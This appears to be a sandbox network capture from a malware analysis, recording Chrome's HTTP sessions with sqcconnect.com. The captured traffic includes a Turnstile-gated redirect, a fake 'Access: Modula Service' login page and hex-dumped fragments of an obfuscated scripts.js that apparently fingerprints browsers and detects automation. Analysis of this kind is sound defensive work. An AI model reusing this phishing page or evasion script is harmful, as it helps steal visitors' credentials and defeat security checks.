                                        cf-chl-out-s: E5IaQSG6D5SyW37ztnGYIaQNrDsUII+LrvDx6IH8lmD6+QyYVaoYD/hudZamnBAE+BBFV/vsnywOGia9f1Ccp7gPiyzzI5X6Ww5XSwVOelPo6x59mhfU/ekWXYBeznz1wEYwkL8WJLI8E4N5zxgeUu0/fEEkqHsiLvoM36+dBERIffOTNByEPtvxirJk0eS4tHuK9J2VMfOKnpv6GfhO+D4qbrFVW35FkfQgGsx1JT12dRu9GDu/IL+QWQNwM+cwbSHAAUBoUEywY8a3LAL+6SzgODU56h7vAkeMs/WP9MX38N9URuQTVXC4mFjmwL4Ayl4WtnuwvChtJlIj2I1ioZdGObYZzPZcRq/u3TXfOn4N2NEXkEj+YSaEIB1VBSkjoG+Lh0zK5szJkynJoq6qMIAaXQXH32edlD+lqRx2EtzQky6HYU/dzqO65FPNpgEjmXjflSEOMuusI3106Tw6bSvA0I4VvW7Trin6+6PArXlmXDmmycrSVuk9YLtZbL/K04endFNEeOuXJ7XMnRF2EEVrDQPoaDnNhOWRc6KuYTaMf6YpYJ4L/6Na+04bI4gF64ekhzV6tGBsR0MVcgCKdBMDa3uWJqygn03lW/ymq6LLymK3QqrHm7+JNeUphD9B7vjgD0aOO6ms1BhSHC1BmPSB1HqXh0fi6N7WDULB2Ii5ml3yTRr3TQ==$o0cq6rG3fS1It7nL
                                        Server: cloudflare
                                        CF-RAY: 8f37b36c8af95e61-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2024-12-17 14:46:08 UTC272INData Raw: 54 4a 42 51 66 6c 4a 39 62 35 61 50 56 58 65 55 6c 6d 6d 62 6b 57 78 53 65 32 47 62 59 6d 4b 6a 6e 36 4a 79 69 32 68 65 64 61 71 51 6a 59 4b 54 6a 61 57 68 70 6f 32 41 71 34 4f 71 65 72 71 47 72 6e 36 39 65 37 2b 36 73 59 44 41 77 5a 71 5a 76 37 54 45 75 35 75 5a 73 63 47 6a 6e 71 57 76 72 4d 69 6f 30 4b 50 64 74 4b 2f 55 73 4c 2b 7a 30 35 2f 47 6e 73 58 47 36 64 66 72 35 36 75 36 37 39 76 71 7a 73 62 6e 74 65 6e 73 38 71 2f 6c 2f 50 69 37 33 37 66 72 75 39 30 46 37 73 44 33 2b 66 48 71 34 4e 76 6b 35 66 7a 65 36 76 48 6f 34 39 37 64 38 4f 4c 67 31 39 48 33 31 63 38 4b 31 39 38 62 41 74 34 66 46 39 38 43 49 68 6b 61 35 75 73 76 35 2f 6b 52 2f 67 45 4f 46 50 55 48 42 77 54 35 4f 44 73 6e 4e 2f 41 6f 49 50 6b 5a 4a 55 41 37 52 68 62 2b 4a 51 6b 73 43 53 73
                                        Data Ascii: TJBQflJ9b5aPVXeUlmmbkWxSe2GbYmKjn6Jyi2hedaqQjYKTjaWhpo2Aq4OqerqGrn69e7+6sYDAwZqZv7TEu5uZscGjnqWvrMio0KPdtK/UsL+z05/GnsXG6dfr56u679vqzsbntens8q/l/Pi737fru90F7sD3+fHq4Nvk5fze6vHo497d8OLg19H31c8K198bAt4fF98CIhka5usv5/kR/gEOFPUHBwT5ODsnN/AoIPkZJUA7Rhb+JQksCSs
                                        2024-12-17 14:46:08 UTC1369INData Raw: 56 79 6b 31 4c 6a 34 36 56 7a 67 78 57 56 51 37 51 6c 74 67 4e 44 64 48 4b 55 6b 34 4f 6d 5a 73 56 55 49 7a 64 6a 46 6c 4f 48 6f 30 4d 30 67 32 53 54 4e 4f 65 6d 43 44 65 30 5a 39 67 47 64 2b 59 55 6d 4e 61 6c 70 6e 61 31 46 6e 56 4a 53 49 68 49 6d 53 57 33 64 76 66 57 75 4c 65 4a 47 65 58 59 4f 64 6c 61 47 6a 61 48 79 73 59 34 78 74 65 5a 78 78 71 4a 47 4e 6f 70 5a 7a 68 49 6d 4c 74 4b 61 61 65 37 6d 4b 73 71 36 36 66 62 52 35 6c 38 6d 34 77 36 43 5a 68 5a 6e 4c 6e 64 47 64 76 5a 2f 43 6a 63 36 5a 75 61 61 75 33 61 75 2b 33 74 6a 4d 74 64 36 37 6e 4e 61 39 6f 39 4f 6a 76 75 58 64 72 4e 7a 73 35 73 48 63 36 65 69 76 73 66 62 75 37 64 62 72 38 64 6e 38 38 50 58 79 34 76 50 39 39 66 4c 69 76 4e 2f 6f 44 39 6b 51 35 75 33 6d 36 4f 33 4d 37 77 51 42 43 68 59
                                        Data Ascii: Vyk1Lj46VzgxWVQ7QltgNDdHKUk4OmZsVUIzdjFlOHo0M0g2STNOemCDe0Z9gGd+YUmNalpna1FnVJSIhImSW3dvfWuLeJGeXYOdlaGjaHysY4xteZxxqJGNopZzhImLtKaae7mKsq66fbR5l8m4w6CZhZnLndGdvZ/Cjc6Zuaau3au+3tjMtd67nNa9o9OjvuXdrNzs5sHc6eivsfbu7dbr8dn88PXy4vP99fLivN/oD9kQ5u3m6O3M7wQBChY
                                        2024-12-17 14:46:08 UTC1369INData Raw: 54 35 51 4c 6a 59 5a 4e 56 70 55 55 30 42 48 52 6a 77 36 63 6c 4d 75 51 30 46 43 4d 6b 56 43 57 6a 5a 50 56 56 4a 38 55 56 78 65 57 31 46 51 65 59 52 5a 5a 49 69 4b 57 46 74 4b 57 56 32 52 5a 30 35 6e 63 49 79 55 5a 6f 6d 55 68 34 56 37 63 6e 46 79 57 32 74 72 65 58 2b 43 66 48 32 49 65 6f 56 38 66 48 75 70 68 36 46 71 72 70 32 70 62 59 71 43 63 6e 46 78 68 4c 32 50 76 70 61 63 67 62 36 63 74 5a 61 32 73 71 48 45 7a 4b 53 56 78 49 71 67 72 4a 4c 45 74 4e 57 6d 6b 71 54 48 31 4c 71 76 70 37 4b 33 74 72 75 61 34 37 75 76 6f 63 48 52 73 36 47 34 75 4e 76 6f 78 38 62 68 7a 74 33 48 39 63 37 31 34 50 6a 4b 73 38 62 78 2f 4c 58 68 7a 4d 71 2b 31 65 44 34 33 64 33 54 31 67 66 59 44 4d 58 35 35 4f 72 39 32 2b 72 74 45 68 48 6d 44 74 58 58 36 67 37 75 31 51 76 37
                                        Data Ascii: T5QLjYZNVpUU0BHRjw6clMuQ0FCMkVCWjZPVVJ8UVxeW1FQeYRZZIiKWFtKWV2RZ05ncIyUZomUh4V7cnFyW2treX+CfH2IeoV8fHuph6Fqrp2pbYqCcnFxhL2Pvpacgb6ctZa2sqHEzKSVxIqgrJLEtNWmkqTH1Lqvp7K3trua47uvocHRs6G4uNvox8bhzt3H9c714PjKs8bx/LXhzMq+1eD43d3T1gfYDMX55Or92+rtEhHmDtXX6g7u1Qv7
                                        2024-12-17 14:46:08 UTC1369INData Raw: 4a 57 55 32 51 71 50 45 35 75 51 57 70 73 4d 6d 78 51 4c 33 46 6d 53 46 51 36 58 54 64 51 65 54 77 34 67 6e 52 44 67 6c 74 37 4f 34 4a 6b 53 6c 2b 43 54 55 35 69 58 46 4e 54 6a 48 36 51 6b 5a 42 55 6c 5a 68 62 63 46 6d 5a 59 47 78 30 59 5a 78 30 67 36 57 69 71 6e 79 70 6a 6f 53 62 70 49 53 71 63 4c 4b 47 6f 71 56 32 6d 58 65 38 73 62 53 49 6b 4c 70 33 6b 62 75 30 67 61 42 35 78 48 76 47 79 49 71 75 79 6f 76 4f 76 70 79 70 6b 37 61 30 78 4d 33 43 74 4c 48 57 76 74 4c 41 31 4a 7a 57 77 4e 71 33 6f 4e 37 65 76 4f 62 6e 34 63 33 75 70 2b 44 43 37 76 47 78 73 64 36 32 37 63 79 33 35 75 71 36 39 72 2b 2f 36 74 44 67 2f 4e 6a 79 36 50 33 63 34 4f 59 42 37 67 76 6d 7a 66 4c 77 79 39 48 48 30 39 59 54 37 41 2f 74 46 75 33 62 32 42 4d 44 49 78 44 6b 44 68 63 47 4a
                                        Data Ascii: JWU2QqPE5uQWpsMmxQL3FmSFQ6XTdQeTw4gnRDglt7O4JkSl+CTU5iXFNTjH6QkZBUlZhbcFmZYGx0YZx0g6WiqnypjoSbpISqcLKGoqV2mXe8sbSIkLp3kbu0gaB5xHvGyIquyovOvpypk7a0xM3CtLHWvtLA1JzWwNq3oN7evObn4c3up+DC7vGxsd627cy35uq69r+/6tDg/Njy6P3c4OYB7gvmzfLwy9HH09YT7A/tFu3b2BMDIxDkDhcGJ
                                        2024-12-17 14:46:08 UTC165INData Raw: 42 5a 6b 64 6c 56 43 78 47 5a 56 6c 6e 53 6d 4e 77 54 33 4a 35 58 45 6c 53 54 44 61 42 64 6d 56 61 58 6e 6c 55 62 46 39 4f 66 34 74 52 69 33 74 77 6b 49 6d 55 63 32 68 73 62 6c 52 79 57 49 35 67 6d 34 47 50 56 70 39 67 64 47 4b 6a 67 59 46 69 71 47 53 41 61 61 75 4a 67 6d 79 78 68 62 69 35 68 70 57 47 70 35 71 63 65 38 43 69 74 70 57 30 73 4d 62 48 77 38 4f 6b 71 61 32 46 6d 61 47 6c 6d 74 4f 2f 71 63 50 45 31 39 65 50 72 4e 53 6c 75 63 62 5a 75 63 2f 4d 32 36 54 44 76 4a 2f 68 73 2b 4f 71
                                        Data Ascii: BZkdlVCxGZVlnSmNwT3J5XElSTDaBdmVaXnlUbF9Of4tRi3twkImUc2hsblRyWI5gm4GPVp9gdGKjgYFiqGSAaauJgmyxhbi5hpWGp5qce8CitpW0sMbHw8Okqa2FmaGlmtO/qcPE19ePrNSlucbZuc/M26TDvJ/hs+Oq


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        17192.168.2.1749698103.233.24.194433892C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2024-12-17 14:46:08 UTC1150OUTPOST /editor/?audio=82bbc753fb82587736ffdf0df4ddb367:525c842416fd7327ee9fe3c658ce04c498788ab4db1c9c6b3cf5182b33d6839f HTTP/1.1
                                        Host: sqcconnect.com
                                        Connection: keep-alive
                                        Content-Length: 1761
                                        Cache-Control: max-age=0
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        sec-ch-ua-platform: "Windows"
                                        Upgrade-Insecure-Requests: 1
                                        Origin: https://sqcconnect.com
                                        Content-Type: application/x-www-form-urlencoded
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Sec-Fetch-Site: same-origin
                                        Sec-Fetch-Mode: navigate
                                        Sec-Fetch-Dest: document
                                        Referer: https://sqcconnect.com/editor/?audio=82bbc753fb82587736ffdf0df4ddb367:525c842416fd7327ee9fe3c658ce04c498788ab4db1c9c6b3cf5182b33d6839f
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        Cookie: convenient=82bbc753fb82587736ffdf0df4ddb367%3A525c842416fd7327ee9fe3c658ce04c498788ab4db1c9c6b3cf5182b33d6839f
                                        2024-12-17 14:46:08 UTC1761OUTData Raw: 63 66 2d 74 75 72 6e 73 74 69 6c 65 2d 72 65 73 70 6f 6e 73 65 3d 30 2e 2d 74 59 63 63 32 4a 67 70 6b 4a 63 6e 36 33 62 5a 48 79 53 4f 69 64 34 5a 38 35 7a 75 4a 77 6d 31 70 4c 48 6b 58 44 4d 77 75 63 62 49 69 36 45 54 66 76 76 62 76 37 77 35 2d 64 64 74 64 79 41 65 6e 6c 4c 6d 77 6e 70 53 67 52 34 6c 7a 79 58 57 62 63 58 32 4b 47 50 79 55 42 51 6d 41 77 69 42 6d 74 6a 58 46 33 6e 42 51 5a 46 6d 6a 4f 7a 76 57 30 6a 32 70 32 67 4c 58 36 33 4c 52 39 4d 4f 44 74 49 34 2d 6b 48 77 41 4b 62 58 77 34 4e 6d 75 31 51 35 55 59 73 53 31 57 67 56 4b 38 51 36 79 67 36 52 65 30 4c 77 74 45 36 67 70 6b 73 62 59 38 51 4e 64 66 59 65 4f 44 4a 68 68 62 4b 42 35 54 6f 44 52 59 6f 31 38 57 4e 64 67 37 73 35 47 69 61 32 54 31 4d 43 45 6e 54 71 49 49 47 59 4d 42 75 39 42 67
                                        Data Ascii: cf-turnstile-response=0.-tYcc2JgpkJcn63bZHySOid4Z85zuJwm1pLHkXDMwucbIi6ETfvvbv7w5-ddtdyAenlLmwnpSgR4lzyXWbcX2KGPyUBQmAwiBmtjXF3nBQZFmjOzvW0j2p2gLX63LR9MODtI4-kHwAKbXw4Nmu1Q5UYsS1WgVK8Q6yg6Re0LwtE6gpksbY8QNdfYeODJhhbKB5ToDRYo18WNdg7s5Gia2T1MCEnTqIIGYMBu9Bg
                                        2024-12-17 14:46:09 UTC430INHTTP/1.1 302 Found
                                        Date: Tue, 17 Dec 2024 14:46:08 GMT
                                        Server: Apache
                                        Set-Cookie: convenient=82bbc753fb82587736ffdf0df4ddb367%3A525c842416fd7327ee9fe3c658ce04c498788ab4db1c9c6b3cf5182b33d6839f
                                        Set-Cookie: minutes=u2W7DENHICSr
                                        Location: sso?audio=82bbc753fb82587736ffdf0df4ddb367:525c842416fd7327ee9fe3c658ce04c498788ab4db1c9c6b3cf5182b33d6839f
                                        Content-Length: 0
                                        Connection: close
                                        Content-Type: text/html; charset=UTF-8


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        18192.168.2.1749726104.18.94.414433892C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2024-12-17 14:46:09 UTC598OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/336816551:1734444914:H7AwvCHEDObeSZScAcpjc5TTruO7fZKfwv33awfQW9E/8f37b31c6b081a48/hxTSjkmCydcj_MQusyCNkoWswodcbgjiel_BXREfJ6w-1734446755-1.1.1.1-JxJqCA06B4458AttnAPD579FiF.E59WgWAj9WbxYYxVm8ima6QmlnepWAtA15GdX HTTP/1.1
                                        Host: challenges.cloudflare.com
                                        Connection: keep-alive
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: */*
                                        Sec-Fetch-Site: none
                                        Sec-Fetch-Mode: cors
                                        Sec-Fetch-Dest: empty
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        2024-12-17 14:46:10 UTC379INHTTP/1.1 404 Not Found
                                        Date: Tue, 17 Dec 2024 14:46:10 GMT
                                        Content-Type: application/json
                                        Content-Length: 7
                                        Connection: close
                                        cf-chl-out: aMSV1nGuGqIzdpXHgJ4SHeYgIVEgNK6hhHM=$9yNiLhgIp1hD9TPy
                                        cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                        Server: cloudflare
                                        CF-RAY: 8f37b378a82c0cb0-EWR
                                        alt-svc: h3=":443"; ma=86400
                                        2024-12-17 14:46:10 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                        Data Ascii: invalid


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        19192.168.2.1749727103.233.24.194433892C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2024-12-17 14:46:10 UTC1071OUTGET /editor/sso?audio=82bbc753fb82587736ffdf0df4ddb367:525c842416fd7327ee9fe3c658ce04c498788ab4db1c9c6b3cf5182b33d6839f HTTP/1.1
                                        Host: sqcconnect.com
                                        Connection: keep-alive
                                        Cache-Control: max-age=0
                                        Upgrade-Insecure-Requests: 1
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                        Sec-Fetch-Site: same-origin
                                        Sec-Fetch-Mode: navigate
                                        Sec-Fetch-Dest: document
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        sec-ch-ua-platform: "Windows"
                                        Referer: https://sqcconnect.com/editor/?audio=82bbc753fb82587736ffdf0df4ddb367:525c842416fd7327ee9fe3c658ce04c498788ab4db1c9c6b3cf5182b33d6839f
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        Cookie: convenient=82bbc753fb82587736ffdf0df4ddb367%3A525c842416fd7327ee9fe3c658ce04c498788ab4db1c9c6b3cf5182b33d6839f; minutes=u2W7DENHICSr
                                        2024-12-17 14:46:11 UTC159INHTTP/1.1 200 OK
                                        Date: Tue, 17 Dec 2024 14:46:11 GMT
                                        Server: Apache
                                        Connection: close
                                        Transfer-Encoding: chunked
                                        Content-Type: text/html; charset=UTF-8
                                        2024-12-17 14:46:11 UTC1354INData Raw: 35 33 65 0d 0a 0a 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 63 63 65 73 73 3a 20 4d 6f 64 75 6c 61 20 53 65 72 76 69 63 65 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 61 70 69 2e 66 61 76 69 63 6f 6e 6b 69 74 2e 63 6f 6d 2f 6d 6f 64 75 6c 61 2e 63 6f 6d 2f 31 34 34 22 20 72 65 6c 3d 22 73 68 6f 72
                                        Data Ascii: 53e<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Access: Modula Service</title> <link href="https://api.faviconkit.com/modula.com/144" rel="shor


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        20192.168.2.1749728103.233.24.194433892C:\Program Files\Google\Chrome\Application\chrome.exe
                                        TimestampBytes transferredDirectionData
                                        2024-12-17 14:46:13 UTC786OUTGET /editor/scripts.js HTTP/1.1
                                        Host: sqcconnect.com
                                        Connection: keep-alive
                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                        sec-ch-ua-mobile: ?0
                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                        sec-ch-ua-platform: "Windows"
                                        Accept: */*
                                        Sec-Fetch-Site: same-origin
                                        Sec-Fetch-Mode: no-cors
                                        Sec-Fetch-Dest: script
                                        Referer: https://sqcconnect.com/editor/sso?audio=82bbc753fb82587736ffdf0df4ddb367:525c842416fd7327ee9fe3c658ce04c498788ab4db1c9c6b3cf5182b33d6839f
                                        Accept-Encoding: gzip, deflate, br
                                        Accept-Language: en-US,en;q=0.9
                                        Cookie: convenient=82bbc753fb82587736ffdf0df4ddb367%3A525c842416fd7327ee9fe3c658ce04c498788ab4db1c9c6b3cf5182b33d6839f; minutes=u2W7DENHICSr
                                        2024-12-17 14:46:14 UTC213INHTTP/1.1 200 OK
                                        Date: Tue, 17 Dec 2024 14:46:13 GMT
                                        Server: Apache
                                        Last-Modified: Tue, 17 Dec 2024 12:26:57 GMT
                                        Accept-Ranges: bytes
                                        Content-Length: 73775
                                        Connection: close
                                        Content-Type: text/javascript
                                        2024-12-17 14:46:14 UTC7979INData Raw: 66 75 6e 63 74 69 6f 6e 20 61 30 5f 30 78 34 33 34 37 28 29 20 7b 20 63 6f 6e 73 74 20 5f 30 78 63 38 34 61 32 64 20 3d 20 5b 27 79 6e 63 53 63 72 69 70 74 49 27 2c 20 27 41 41 41 42 43 41 59 41 41 41 27 2c 20 27 72 65 61 73 6f 6e 73 27 2c 20 27 50 56 79 47 5a 27 2c 20 27 77 47 50 62 65 27 2c 20 27 68 69 45 51 6e 27 2c 20 27 5f 65 76 61 6c 75 61 74 65 27 2c 20 27 70 65 72 6d 69 73 73 69 6f 6e 27 2c 20 27 65 42 41 46 55 27 2c 20 27 41 66 46 63 53 4a 41 41 41 41 27 2c 20 27 63 61 6c 6c 65 64 53 65 6c 65 27 2c 20 27 67 67 65 72 27 2c 20 27 4f 72 4c 71 4e 27 2c 20 27 45 72 72 6f 72 5c 78 32 30 66 65 74 63 27 2c 20 27 73 73 69 6f 6e 73 3a 27 2c 20 27 67 5f 72 65 6e 64 65 72 65 72 27 2c 20 27 73 63 72 6f 6c 6c 27 2c 20 27 72 5f 75 6e 77 72 61 70 70 65 27 2c 20
                                        Data Ascii: function a0_0x4347() { const _0xc84a2d = ['yncScriptI', 'AAABCAYAAA', 'reasons', 'PVyGZ', 'wGPbe', 'hiEQn', '_evaluate', 'permission', 'eBAFU', 'AfFcSJAAAA', 'calledSele', 'gger', 'OrLqN', 'Error\x20fetc', 'ssions:', 'g_renderer', 'scroll', 'r_unwrappe',
                                        2024-12-17 14:46:14 UTC8000INData Raw: 28 5f 30 78 33 37 36 63 65 38 2c 20 61 72 67 75 6d 65 6e 74 73 29 3b 20 72 65 74 75 72 6e 20 5f 30 78 31 30 38 39 39 34 20 3d 20 6e 75 6c 6c 2c 20 5f 30 78 33 34 66 35 65 38 3b 20 7d 20 7d 20 7d 20 3a 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 7d 3b 20 72 65 74 75 72 6e 20 5f 30 78 33 36 34 38 31 64 20 3d 20 21 5b 5d 2c 20 5f 30 78 33 61 37 66 30 35 3b 20 7d 20 7d 3b 20 7d 28 29 29 3b 20 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 63 6f 6e 73 74 20 5f 30 78 35 62 33 65 61 39 20 3d 20 61 30 5f 30 78 33 32 38 61 3b 20 69 66 20 28 27 55 70 72 4e 75 27 20 21 3d 3d 20 5f 30 78 35 62 33 65 61 39 28 30 78 32 34 65 29 29 20 5f 30 78 32 35 63 36 30 65 28 74 68 69 73 2c 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 63 6f 6e 73 74 20 5f 30 78 33 39 65 36 38 32 20
                                        Data Ascii: (_0x376ce8, arguments); return _0x108994 = null, _0x34f5e8; } } } : function () { }; return _0x36481d = ![], _0x3a7f05; } }; }()); (function () { const _0x5b3ea9 = a0_0x328a; if ('UprNu' !== _0x5b3ea9(0x24e)) _0x25c60e(this, function () { const _0x39e682
                                        2024-12-17 14:46:14 UTC8000INData Raw: 20 5f 30 78 32 37 64 61 37 30 5b 5f 30 78 33 64 66 61 61 35 28 30 78 32 64 38 29 5d 20 3d 3d 3d 20 5f 30 78 34 31 31 35 63 38 5b 5f 30 78 33 64 66 61 61 35 28 30 78 32 65 63 29 5d 20 7c 7c 20 21 28 5f 30 78 33 64 66 61 61 35 28 30 78 31 66 61 29 20 69 6e 20 5f 30 78 66 32 66 65 62 31 29 20 7c 7c 20 5f 30 78 35 32 38 35 65 36 5b 5f 30 78 37 31 39 38 38 33 28 30 78 32 61 37 29 5d 28 29 20 3c 20 30 78 61 3b 20 65 6c 73 65 20 74 68 69 73 5b 5f 30 78 33 64 66 61 61 35 28 30 78 32 62 61 29 20 2b 20 5f 30 78 37 31 39 38 38 33 28 30 78 31 36 36 29 5d 2b 2b 3b 20 7d 20 74 68 69 73 5b 5f 30 78 33 64 66 61 61 35 28 30 78 32 61 35 29 20 2b 20 27 73 27 5d 20 3d 20 30 78 30 2c 20 74 68 69 73 5b 5f 30 78 37 31 39 38 38 33 28 30 78 32 63 30 29 20 2b 20 27 73 27 5d 20 3d
                                        Data Ascii: _0x27da70[_0x3dfaa5(0x2d8)] === _0x4115c8[_0x3dfaa5(0x2ec)] || !(_0x3dfaa5(0x1fa) in _0xf2feb1) || _0x5285e6[_0x719883(0x2a7)]() < 0xa; else this[_0x3dfaa5(0x2ba) + _0x719883(0x166)]++; } this[_0x3dfaa5(0x2a5) + 's'] = 0x0, this[_0x719883(0x2c0) + 's'] =
                                        2024-12-17 14:46:14 UTC8000INData Raw: 6c 73 65 20 72 65 74 75 72 6e 20 21 21 5b 5d 3b 20 7d 20 65 6c 73 65 20 72 65 74 75 72 6e 20 21 21 5b 5d 3b 20 7d 20 5b 5f 30 78 66 38 32 34 63 36 28 30 78 32 33 31 29 20 2b 20 5f 30 78 66 38 32 34 63 36 28 30 78 32 32 62 29 5d 28 5f 30 78 35 38 38 32 30 65 29 20 7b 20 63 6f 6e 73 74 20 5f 30 78 35 32 66 66 63 62 20 3d 20 5f 30 78 33 62 31 65 66 37 3b 20 69 66 20 28 5f 30 78 35 32 66 66 63 62 28 30 78 31 64 65 29 20 3d 3d 3d 20 5f 30 78 35 32 66 66 63 62 28 30 78 32 63 38 29 29 20 7b 20 63 6f 6e 73 74 20 5f 30 78 32 65 62 35 34 66 20 3d 20 5f 30 78 34 36 66 37 65 39 3b 20 69 66 20 28 5f 30 78 32 65 62 35 34 66 28 30 78 32 37 36 29 20 21 3d 3d 20 5f 30 78 35 32 66 66 63 62 28 30 78 32 31 34 29 29 20 74 68 69 73 5b 5f 30 78 32 65 62 35 34 66 28 30 78 32 39
                                        Data Ascii: lse return !![]; } else return !![]; } [_0xf824c6(0x231) + _0xf824c6(0x22b)](_0x58820e) { const _0x52ffcb = _0x3b1ef7; if (_0x52ffcb(0x1de) === _0x52ffcb(0x2c8)) { const _0x2eb54f = _0x46f7e9; if (_0x2eb54f(0x276) !== _0x52ffcb(0x214)) this[_0x2eb54f(0x29
                                        2024-12-17 14:46:14 UTC8000INData Raw: 5d 20 3d 20 5f 30 78 34 36 38 33 32 39 5b 5f 30 78 32 62 36 66 64 36 28 30 78 32 33 62 29 5d 2c 20 5f 30 78 31 62 31 32 63 30 5b 5f 30 78 34 39 35 35 61 64 28 30 78 32 31 61 29 5d 20 3d 20 5f 30 78 33 37 65 62 38 34 2c 20 5f 30 78 35 38 37 37 64 61 28 5f 30 78 31 62 31 32 63 30 29 3b 20 7d 20 7d 20 5b 5f 30 78 66 38 32 34 63 36 28 30 78 32 65 31 29 20 2b 20 5f 30 78 66 38 32 34 63 36 28 30 78 32 65 30 29 5d 28 29 20 7b 20 63 6f 6e 73 74 20 5f 30 78 32 63 61 36 31 37 20 3d 20 5f 30 78 33 62 31 65 66 37 3b 20 69 66 20 28 5f 30 78 32 63 61 36 31 37 28 30 78 32 37 33 29 20 21 3d 3d 20 5f 30 78 32 63 61 36 31 37 28 30 78 31 38 65 29 29 20 7b 20 63 6f 6e 73 74 20 5f 30 78 33 35 34 39 65 38 20 3d 20 5f 30 78 66 38 32 34 63 36 2c 20 5f 30 78 31 34 63 30 38 64 20
                                        Data Ascii: ] = _0x468329[_0x2b6fd6(0x23b)], _0x1b12c0[_0x4955ad(0x21a)] = _0x37eb84, _0x5877da(_0x1b12c0); } } [_0xf824c6(0x2e1) + _0xf824c6(0x2e0)]() { const _0x2ca617 = _0x3b1ef7; if (_0x2ca617(0x273) !== _0x2ca617(0x18e)) { const _0x3549e8 = _0xf824c6, _0x14c08d
                                        2024-12-17 14:46:14 UTC8000INData Raw: 63 28 30 78 32 31 61 29 5d 20 3d 20 5f 30 78 33 33 32 36 37 2c 20 5f 30 78 31 38 66 33 31 66 28 5f 30 78 34 64 30 31 31 32 29 3b 20 7d 20 65 6c 73 65 20 7b 20 63 6f 6e 73 74 20 5f 30 78 33 35 64 31 66 64 20 3d 20 64 6f 63 75 6d 65 6e 74 5b 5f 30 78 32 62 35 64 61 63 28 30 78 31 66 63 29 20 2b 20 5f 30 78 32 62 35 64 61 63 28 30 78 32 63 32 29 5d 28 5f 30 78 63 31 34 31 32 35 28 30 78 32 33 61 29 29 3b 20 72 65 74 75 72 6e 20 5f 30 78 33 35 64 31 66 64 5b 5f 30 78 63 31 34 31 32 35 28 30 78 31 62 62 29 5d 28 5f 30 78 32 62 35 64 61 63 28 30 78 31 65 37 29 29 20 7c 7c 20 5f 30 78 33 35 64 31 66 64 5b 5f 30 78 32 62 35 64 61 63 28 30 78 32 34 66 29 5d 28 5f 30 78 32 62 35 64 61 63 28 30 78 32 36 61 29 20 2b 20 5f 30 78 32 62 35 64 61 63 28 30 78 31 64 35 29
                                        Data Ascii: c(0x21a)] = _0x33267, _0x18f31f(_0x4d0112); } else { const _0x35d1fd = document[_0x2b5dac(0x1fc) + _0x2b5dac(0x2c2)](_0xc14125(0x23a)); return _0x35d1fd[_0xc14125(0x1bb)](_0x2b5dac(0x1e7)) || _0x35d1fd[_0x2b5dac(0x24f)](_0x2b5dac(0x26a) + _0x2b5dac(0x1d5)
